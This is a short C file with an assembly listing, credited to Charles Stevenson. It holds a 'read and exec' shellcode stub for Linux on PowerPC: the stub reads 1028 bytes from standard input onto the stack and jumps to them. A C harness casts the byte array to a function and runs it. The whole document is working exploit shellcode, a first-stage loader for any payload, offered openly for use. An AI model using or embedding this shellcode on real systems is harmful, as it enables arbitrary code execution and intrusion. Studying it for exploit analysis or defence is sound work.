/* readnexecppc-core.c by Charles Stevenson <core@bokeoa.com> */
char hellcode[] = /* read(0,stack,1028); stack(); linux/ppc by core */
"\x7c\x63\x1a\x79"     /* xor.    r3,r3,r3 */
"\x38\xa0\x04\x04"     /* li      r5,1028 */
"\x30\x05\xfb\xff"     /* addic   r0,r5,-1025 */
"\x7c\x24\x0b\x78"     /* mr      r4,r1 */
"\x44\xde\xad\xf2"     /* sc */
"\x69\x69\x69\x69"     /* nop */
"\x7c\x29\x03\xa6"     /* mtctr   r1 */
"\x4e\x80\x04\x21";    /* bctrl */

int main(void)
{
  void (*shell)() = (void *)&hellcode;
  printf("%d byte read & exec shellcode for linux/ppc by core\n",
         strlen(hellcode));
  shell();
  return 0;
}

#;; read(0,stack,1024); stack();
#;; by Charles Stevenson (core) <core@bokeoa.com>
.globl main
main:
	xor. %r3,%r3,%r3 #; file descriptor
	li %r5, 1028 #; 1028 bytes
	addic %r0,%r5,-1028+3 #; __NR_read
	mr %r4,%r1 #; (void *) stack pointer
	.long 0x44deadf2 #; syscall
	.long 0x69696969 #; nop
	mtctr %r1 #; move stack pointer into ctr
	bctrl #; branch to ctr